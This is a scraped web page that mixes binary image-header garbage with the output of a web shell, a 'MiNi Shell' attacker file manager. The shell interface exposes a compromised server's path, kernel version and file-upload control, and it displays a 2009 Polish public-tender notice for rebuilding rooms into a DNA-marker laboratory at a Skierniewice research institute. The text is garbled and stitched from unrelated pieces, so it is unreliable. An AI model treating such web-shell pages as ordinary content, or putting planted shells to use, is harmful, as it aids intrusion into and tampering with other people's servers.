JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/87662-N-2009.html

<p class="kh_header"><b>Skierniewice: Robota budowlana p.t.,,Przebudowa pomieszczeń na Laboratorium Markerów DNA,, w zabytkowej oficynie nr2 w Osadzie Pałacowej przy ul. Konstytucji 3 Maja 1/3 należącej do Instytutu Warzywnictwa im. Emila Chroboczka w Skierniewicach</b><br>
<b>Numer ogłoszenia: 87662 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Warzywnictwa im. Emila Chroboczka , ul. Konstytucji 3 Maja 1/3, 96-100 Skierniewice, woj. łódzkie, tel. 046 8332211 do 13, faks 046 8333186.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inwarz.skierniewice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Badawczo-Rozwojowa.Nauka..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Robota budowlana p.t.,,Przebudowa pomieszczeń na Laboratorium Markerów DNA,, w zabytkowej oficynie nr2 w Osadzie Pałacowej przy ul. Konstytucji 3 Maja 1/3 należącej do Instytutu Warzywnictwa im. Emila Chroboczka w Skierniewicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, polegające na wykonaniu przebudowy wnętrz części zabytkowej oficyny nr 2 na laboratorium, na terenie tzw. Osady pałacowej, należącej do Instytutu Warzywnictwa, przy ul. Konstytucji 3 Maja 1/3 w Skierniewicach, na działce ew. nr 41 / 7 (obręb 09). Przebudowie podlegać będzie część pomieszczeń o pow. użytkowej 144,42 m2 na parterze budynku. Zakres prac obejmuje roboty rozbiórkowe, odgrzybieniowe i izolacyjne, budowlano-wykończeniowe, instalacyjne (hydrauliczne i elektryczne) oraz wyposażeniowe.

Zakres zamówienia przewiduje m.in.:
a)  Demontaż wyposażenia, rurociągów, wykładzin i innych elementów wykończeniowych, rozebranie podłóg i zbędnych ścianek, wykucie lub poszerzenie otworów drzwiowych, skucie zniszczonych i rozwarstwionych tynków wapiennych, wywóz i utylizacja materiałów rozbiórkowych.
b) Wykonanie miejscowego odgrzybiania i izolacji niektórych ścian wewnętrznych i zewnętrznych.
c)  Wymiana stolarki drzwiowej oraz dorobienie potrzebnej stolarki okiennej.
d)  Wykonanie nowych ścianek działowych.
e)  Wykonanie lub uzupełnienie tynków cementowo-wapiennych kat. III. 
f)  Wykonanie nowych posadzek wraz z ich izolacją cieplną i przeciwwilgociową. 
g)  Wymianę instalacji elektrycznej.
h)  Wykonanie przyłącza wodociągowego.
i)  Wymianę instalacji wodno-kanalizacyjnej.
j)  Wykonanie gładzi gipsowych na ścianach i sufitach.
j)  Okładzinowanie ścian i podłóg płytkami ceramicznymi. 
k)  Wykonanie instalacji wentylacyjnej i klimatyzacji miejscowej
l)   Prace malarskie.
ł)   Kompletacja i montaż wyposażenia (m.in. meblowego we wszystkich pomieszczeniach, w tym atestowanych mebli laboratoryjnych i dygestorium metalowego o szerokości nominalnej 120 cm oraz klimatyzatorów w pomieszczeniach nr 4,5,6,8).

	Zakres prac i rodzaj wyposażenia oraz inne wymogi związane z realizacją zamawianych robót szczegółowo opisano w niniejszej specyfikacji i w następujących dokumentach: Projekt budowlany (załącznik nr  6), Specyfikacja techniczna wykonania i odbioru robót (załącznik nr 7), Przedmiar robót wraz z kosztorysami  ofertowymi  /tzw. ślepymi/(załącznik nr 8 - dla robót budowlanych + załącznik nr 9 - dla kompletacji wyposażenia), Opis wymagań technicznych wyposażenia (załącznik nr 10).
	Zamawiający dopuszcza zastosowanie materiałów i wyposażenia o parametrach nie gorszych niż wskazane w dokumentach.
Roboty budowlane, rzemieślnicze i montażowe powinny być wykonane zgodnie z zasadami sztuki budowlanej, obowiązującymi przepisami i normami, pod nadzorem osób uprawnionych.
Aranżacja całego wyposażenia ma być dostosowana do specyfiki pracy tego laboratorium biotechnologicznego, zapewniać funkcjonalność, estetykę, nowoczesne wzornictwo, odporność na uszkodzenia mechaniczne i chemiczne, optymalne wykorzystanie przestrzeni roboczej, bezpieczeństwo i ergonomię pracy dla zatrudnionych osób. 

Meble laboratoryjne mają być skompletowane według specyfikacji asortymentowo-wymiarowej podanej w załączniku nr 9 (lub w innej równoważnej konfiguracji) i rozmieszczone zgodnie z projektem wyposażeniowym (t.j. wg rys. nr 04). 
Oferowane meble laboratoryjne powinny spełniać wymogi takich norm jak EN 13150, PN-EN 14056, PN-EN 14727, co powinno być potwierdzone deklaracją zgodności, wydaną zgodnie z przepisami przez producenta, albo stosownym certyfikatem lub atestem potwierdzającym ich odpowiednią jakość. 
pogwarancyjny na terenie Polski. 
Pozostałe informacje dotyczące opisu przedmiotu, wielkości i zakresu zamówienia określa specyfikacja istotnych warunków zamówienia (siwz)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.46.10-9, 45.23.24.60-4, 45.30.00.00-0, 45.40.00.00-1, 45.11.13.00-1, 45.23.24.60-4, 45.31.00.00-3, 45.32.00.00-6, 45.41.00.00-4, 45.42.11.52-4, 45.42.11.30-4, 45.43.00.00-0, 45.43.11.00-8, 45.43.12.00-9, 45.44.21.00-8, 45.42.11.53-1, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Obowiązek wpłaty wadium
         Przystępując do przetargu, wykonawca jest obowiązany wnieść wadium w  
         Wysokości 5.000 PLN  (słownie: pięć tysięcy złotych) przed upływem terminu składania ofert.
2. Wadium można wnieść w jednej z następujących form:
-w pieniądzu (przelewem na konto, niedopuszczalna jest wpłata w kasie zamawiającego),
- w gwarancji bankowej,
- w  poręczeniu bankowym lub poręczeniu spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- w gwarancji ubezpieczeniowej,
-w poręczeniu udzielonym przez podmioty, których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.).
Wadium wnoszone w pieniądzu wykonawca jest zobowiązany wpłacić na rachunek bankowy:  79 1500 1689 1216 8000 7506 0000 w KREDYT BANK S.A. O/SKIERNIEWICE
z dopiskiem WADIUM.

	Wadium uważa się za wniesione skutecznie wówczas, gdy przed upływem terminu do złożenia ofert wpłynie na rachunek zamawiającego, zaś dowód wniesienia wadium zostanie dołączony do oferty..
Wadium wnoszone w formie innej niż pieniężna musi spełniać następujące wymagania:
- musi odpowiadać co do wartości wysokości wadium określonej w specyfikacji,
 -musi odpowiadać co do terminu ważności terminowi związania ofertą 
                  określonemu w specyfikacji,
- musi zawierać w swojej treści okoliczności, w których gwarant (poręczyciel) wypłaci kwotę wadium zamawiającemu, wraz z klauzulą mówiącą, że wypłata  nastąpi na pierwsze żądanie zamawiającego bez protestu gwaranta (poręczyciela),
- musi być podpisane przez osobę lub osoby upoważnione do reprezentacji gwaranta (poręczyciela),
- do oferty należy dołączyć dowód wniesienia wadium:
a) w formie kopii potwierdzonej za zgodność przez wykonawcę, jeśli wadium zostało wniesione w formie pieniężnej na wskazane w siwz konto,
b) w formie oryginału, jeśli wadium było w formie innej niż pieniężna.
Wykonawca, który nie wniesie wadium w wymaganej formie, zostanie wykluczony z postępowania.
3.  Zwrot wadium następuje w przypadkach określonych w art. 46 ust. 1 i 2 uPzp.
     Zamawiający dokona zwrotu wadium niezwłocznie, gdy zaistnieje jedna z niżej   
     wymienionych okoliczności:
- upłynie termin związania ofertą;
- nastąpi zawarcie umowy;
- zamawiający unieważni przetarg, zaś protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich składania.
      Zamawiający dokona zwrotu wadium w terminie 3 dni od zgłoszenia pisemnego wniosku  
      przez wykonawcę:
- który wycofał ofertę przed upływem terminu składania ofert,
- który został wykluczony z postępowania,
- którego oferta została odrzucona.
4.  Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadkach określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp, t.j.: jeżeli:
- wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni,  iż wynika to z przyczyn nieleżących po jego stronie;
- wykonawca, którego oferta została wybrana, nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
5.   Zamawiający zażąda ponownego wniesienia wadium w przypadkach określonych w art. 46 ust. 3 ustawy Pzp.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych tj.: 
1)  Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, przy czym: 
Wymagane jest wykonanie w ostatnich 5 latach z należytą starannością trzech robót o charakterze ogólnobudowlanym o wartości minimum 300 000,00 zł brutto każda.
 Wymagane jest dysponowanie osobą lub osobami pełniącymi funkcje:
- kierownika budowy z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń;
- kierownik robót instalacyjnych z uprawnieniami w zakresie instalacji elektrycznych;
- kierownik robót instalacyjnych w zakresie instalacji sanitarnych bez ograniczeń.
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, przy czym: 
- Wymagana jest polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości minimum 200 000,00 zł.
4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Ocena spełniania warunków udziału w postępowaniu będzie dokonywana zgodnie z formułą: spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.    Oświadczenie wg art. 44, na formularzu stanowiącym załącznik nr 2 do siwz, o spełnianiu      wymagań z art. 22 ust. 1 i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
2.   Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji  
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  
      zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 
      miesięcy przed upływem terminu składania ofert.
3.  Polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności do kwoty co najmniej 200.000,- zł (słownie: dwieście tysięcy złotych).
4.  Wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, odpowiadających swoim rodzajem i wartością (min. 300 000,- zł brutto) robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem dat i miejsc ich wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Wykonawca powinien wykazać wykonanie co najmniej trzech takich robót. (Wykaz ten można  przedstawić na druku stanowiącym załącznik nr 3 do SIWZ, lub wg podanego wzoru)
5.  Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych (można go przedstawić na druku stanowiącym załącznik nr 4 do SIWZ, lub wg podanego wzoru). Wymaga się załączenia do oferty kserokopii wymaganych uprawnień budowlanych i aktualnego wpisu do Izby Inżynierów Budownictwa. 

Wykonawca składa wszystkie dokumenty w formie oryginału lub kserkopii poświadczonej za zgodność z oryginałem przez wykonawcę.
Wszystkie dokumenty sporządzone w języku obcym składane są wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to stosuje się do przepisów §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz.U. z 2006 r. Nr 87, poz. 605).

Spełnienie pozostałych wymogów Wykonawcy potwierdzają odpowiednimi dokumentami oraz stosownymi załącznikami na formularzach załączonych do siwz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Jakość i standard wyposażenia - 15</li>
<li>3 - Termin gwarancji - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.inwarz.skierniewice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, w budynku głównym Instytutu Warzywnictwa im. Emila Chroboczka, 96-100 Skierniewice, ul. Konstytucji 3 Maja 1/3, pokój nr 22lub za zaliczeniem pocztowym.Koszt(cena):50.-zł/sz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 14:00, miejsce: Kancelaria Instytutu Warzywnictwa im. Emila Chroboczka, ul. Konstytucji 3 Maja 1/3, 96-100 Skierniewice..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com